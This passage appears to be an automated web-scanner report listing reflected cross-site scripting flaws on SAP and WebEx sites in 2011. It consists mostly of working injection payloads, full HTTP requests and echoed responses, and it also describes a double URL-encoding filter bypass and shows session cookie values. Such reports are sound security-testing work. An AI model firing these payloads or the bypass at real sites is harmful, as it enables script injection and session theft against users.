The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 935b5<img%20src%3da%20onerror%3dalert(1)>2e12ad7827b was submitted in the REST URL parameter 1. This input was echoed as 935b5<img src=a onerror=alert(1)>2e12ad7827b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /dispatcher935b5<img%20src%3da%20onerror%3dalert(1)>2e12ad7827b/dispatcher.do? HTTP/1.1 Host: sap.webex.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://connect.sap.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 400 Bad Request Date: Sun, 13 Nov 2011 19:12:37 GMT Server: Apache Set-Cookie: galaxym=R684996998; path=/ Content-Length: 93 Set-Cookie: JSESSIONID=STpQTQWF4yrTv4sTXynlyZn73YHqKDwwhFWP2R2LVRW1dGKRCMmX!-536370640; path=/ Connection: close Content-Type: text/html
Invalid path /dispatcher935b5<img src=a onerror=alert(1)>2e12ad7827b/dispatcher was requested
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bdf7b<img%20src%3da%20onerror%3dalert(1)>588ade06a44 was submitted in the REST URL parameter 1. This input was echoed as bdf7b<img src=a onerror=alert(1)>588ade06a44 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /cmp0306lcbdf7b<img%20src%3da%20onerror%3dalert(1)>588ade06a44/webcomponents/widget/detect.do?siteurl=sap&LID=1&RID=2&TID=21&backUrl=%2Fmw0306lc%2Fmywebex%2Fdefault.do%3Fsiteurl%3Dsap HTTP/1.1 Host: sap.webex.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=pbr8TQWfSkNTbGgl5yGYhLhs7wS9yGt7JGgQh01Grm1Td0vFRSqf!-74812280; galaxym=R1412479787
Response
HTTP/1.1 400 Bad Request Date: Sun, 13 Nov 2011 19:13:42 GMT Server: Apache Set-Cookie: galaxym=R1412479787; path=/ Content-Length: 109 Connection: close Content-Type: text/html
Invalid path /cmp0306lcbdf7b<img src=a onerror=alert(1)>588ade06a44/webcomponents/widget/detect was requested
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cfb5a<img%20src%3da%20onerror%3dalert(1)>1c69d944d2e was submitted in the REST URL parameter 2. This input was echoed as cfb5a<img src=a onerror=alert(1)>1c69d944d2e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /cmp0306lc/webcomponentscfb5a<img%20src%3da%20onerror%3dalert(1)>1c69d944d2e/widget/detect.do?siteurl=sap&LID=1&RID=2&TID=21&backUrl=%2Fmw0306lc%2Fmywebex%2Fdefault.do%3Fsiteurl%3Dsap HTTP/1.1 Host: sap.webex.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=pbr8TQWfSkNTbGgl5yGYhLhs7wS9yGt7JGgQh01Grm1Td0vFRSqf!-74812280; galaxym=R1412479787
Response
HTTP/1.1 400 Bad Request Date: Sun, 13 Nov 2011 19:13:47 GMT Server: Apache Set-Cookie: galaxym=R3025651845; path=/ Content-Length: 99 Set-Cookie: JSESSIONID=kThMTQWL1D80cqCwXXnLmQpnVPGRvQv6tTBG7LJG4qgrrQx9QXSW!-363712497; path=/ P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Connection: close Content-Type: text/html
Invalid path /webcomponentscfb5a<img src=a onerror=alert(1)>1c69d944d2e/widget/detect was requested
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ce403<img%20src%3da%20onerror%3dalert(1)>1bedc97d51d was submitted in the REST URL parameter 3. This input was echoed as ce403<img src=a onerror=alert(1)>1bedc97d51d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /cmp0306lc/webcomponents/widgetce403<img%20src%3da%20onerror%3dalert(1)>1bedc97d51d/detect.do?siteurl=sap&LID=1&RID=2&TID=21&backUrl=%2Fmw0306lc%2Fmywebex%2Fdefault.do%3Fsiteurl%3Dsap HTTP/1.1 Host: sap.webex.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=pbr8TQWfSkNTbGgl5yGYhLhs7wS9yGt7JGgQh01Grm1Td0vFRSqf!-74812280; galaxym=R1412479787
Response
HTTP/1.1 400 Bad Request Date: Sun, 13 Nov 2011 19:13:51 GMT Server: Apache Set-Cookie: galaxym=R684995909; path=/ Content-Length: 99 Set-Cookie: JSESSIONID=TCKjTQWPxHcpnlV9T8DGQhbgGzDHkxqtmcTZGvQ1G2r0HGj0zfpB!-630472378; path=/ P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Connection: close Content-Type: text/html
Invalid path /webcomponents/widgetce403<img src=a onerror=alert(1)>1bedc97d51d/detect was requested
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ad53a<img%20src%3da%20onerror%3dalert(1)>2f0970f4e1a was submitted in the REST URL parameter 1. This input was echoed as ad53a<img src=a onerror=alert(1)>2f0970f4e1a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /mw0306lcad53a<img%20src%3da%20onerror%3dalert(1)>2f0970f4e1a/mywebex/default.do?siteurl=sap HTTP/1.1 Host: sap.webex.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=pbr8TQWfSkNTbGgl5yGYhLhs7wS9yGt7JGgQh01Grm1Td0vFRSqf!-74812280; galaxym=R1412479787
Response
HTTP/1.1 400 Bad Request Date: Sun, 13 Nov 2011 19:13:29 GMT Server: Apache Set-Cookie: galaxym=R3366792236; path=/ Content-Length: 96 Set-Cookie: JSESSIONID=5rpTTQWZ81zgyh7rBRtjtLCwS58nRynhLwb775nnJvrglpnWB1Yl!-1025044524; path=/ Connection: close Content-Type: text/html
Invalid path /mw0306lcad53a<img src=a onerror=alert(1)>2f0970f4e1a/mywebex/default was requested
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 132b9<img%20src%3da%20onerror%3dalert(1)>15461ba356 was submitted in the REST URL parameter 2. This input was echoed as 132b9<img src=a onerror=alert(1)>15461ba356 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /mw0306lc/mywebex132b9<img%20src%3da%20onerror%3dalert(1)>15461ba356/default.do?siteurl=sap HTTP/1.1 Host: sap.webex.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=pbr8TQWfSkNTbGgl5yGYhLhs7wS9yGt7JGgQh01Grm1Td0vFRSqf!-74812280; galaxym=R1412479787
Response
HTTP/1.1 400 Bad Request Date: Sun, 13 Nov 2011 19:13:34 GMT Server: Apache Set-Cookie: galaxym=R1412479787; path=/ Content-Length: 86 P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Connection: close Content-Type: text/html
Invalid path /mywebex132b9<img src=a onerror=alert(1)>15461ba356/default was requested
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 74f21<img%20src%3da%20onerror%3dalert(1)>bfa558bfac9 was submitted in the mbox parameter. This input was echoed as 74f21<img src=a onerror=alert(1)>bfa558bfac9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the mboxId request parameter is copied into the HTML document as plain text between tags. The payload 555e1<script>alert(1)</script>fc75ba36069 was submitted in the mboxId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the SAMLResponse request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ca1a5'><script>alert(1)</script>a5ad38de15e was submitted in the SAMLResponse parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dc588<a>a60d8aca665 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8748c<a>22aed8f2a61 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the xajax request parameter is copied into the XML document as plain text between tags. The payload 77c98<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>625c56dcaf was submitted in the xajax parameter. This input was echoed as 77c98<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>625c56dcaf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 623de"><a>ae987527070 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /us/en/training-locations/us623de"><a>ae987527070/atlanta,-ga-(kdc HTTP/1.1 Host: training.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d67f9"><a>2515664171f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /us/en/training-locations/usd67f9"><a>2515664171f/atlanta,-ga-(kdc) HTTP/1.1 Host: training.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47afa<a>61129945a2a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5d96f<a>5dd35e8c69e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 624e6"><a>823d4593e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the xajax request parameter is copied into the XML document as plain text between tags. The payload b382f<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>85060c32798 was submitted in the xajax parameter. This input was echoed as b382f<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>85060c32798 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30461"><a>e5b6240e46c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="content-t ...[SNIP]... <a href="/us/en/training-locations/us623de%22%3e%3ca%3eae98752707030461"><a>e5b6240e46c"> ...[SNIP]...
1.60. http://weblogs.sdn.sap.com/pub/wlg/27079 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://weblogs.sdn.sap.com
Path:
/pub/wlg/27079
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93679"><script>alert(1)</script>7a7c3cccb42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sun, 13 Nov 2011 19:51:32 GMT Server: Apache Content-Type: text/html; charset=ISO-8859-1 Content-Length: 17395
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head>
<title>SAP Network Blog: Dynamically Handling Structure Data Types Defined on a Remote Dictionary</title> <link href= ...[SNIP]... <a class="sapTxtSml" href="/pub/wlg/27079?page=last&93679"><script>alert(1)</script>7a7c3cccb42=1&x-showcontent=off#thread"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ddb5%2522a%253d%2522b%2522cd1ccbe2671 was submitted in the REST URL parameter 5. This input was echoed as 5ddb5"a="b"cd1ccbe2671 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /about/company/legal/copyright/index.epx5ddb5%2522a%253d%2522b%2522cd1ccbe2671 HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 39403 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:05:45 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:05:45 GMT; path=/ Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/ Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/ Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:05:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffeb4%2522a%253d%2522b%2522600f8c1162f was submitted in the REST URL parameter 4. This input was echoed as ffeb4"a="b"600f8c1162f in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /about/company/legal/impressum.epxffeb4%2522a%253d%2522b%2522600f8c1162f HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 39393 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:05:39 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:05:39 GMT; path=/ Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/ Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/ Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:05:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f0dd%2522a%253d%2522b%25229f3cec84851 was submitted in the REST URL parameter 4. This input was echoed as 1f0dd"a="b"9f3cec84851 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /about/company/legal/privacy.epx1f0dd%2522a%253d%2522b%25229f3cec84851 HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 39387 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:05:38 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:05:38 GMT; path=/ Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/ Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/ Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:05:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e515a%2522a%253d%2522b%2522596a31fd57e was submitted in the REST URL parameter 4. This input was echoed as e515a"a="b"596a31fd57e in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /about/company/legal/terms_of_use.epxe515a%2522a%253d%2522b%2522596a31fd57e HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 39402 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:05:40 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:05:40 GMT; path=/ Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/ Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/ Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:05:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a950b%2522a%253d%2522b%252216285773807 was submitted in the REST URL parameter 2. This input was echoed as a950b"a="b"16285773807 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /business_management_software/inventory_management.epxa950b%2522a%253d%2522b%252216285773807 HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 34684 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:59 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:59 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:03:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload befcd%2522a%253d%2522b%2522a7ad0d78ceb was submitted in the REST URL parameter 2. This input was echoed as befcd"a="b"a7ad0d78ceb in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
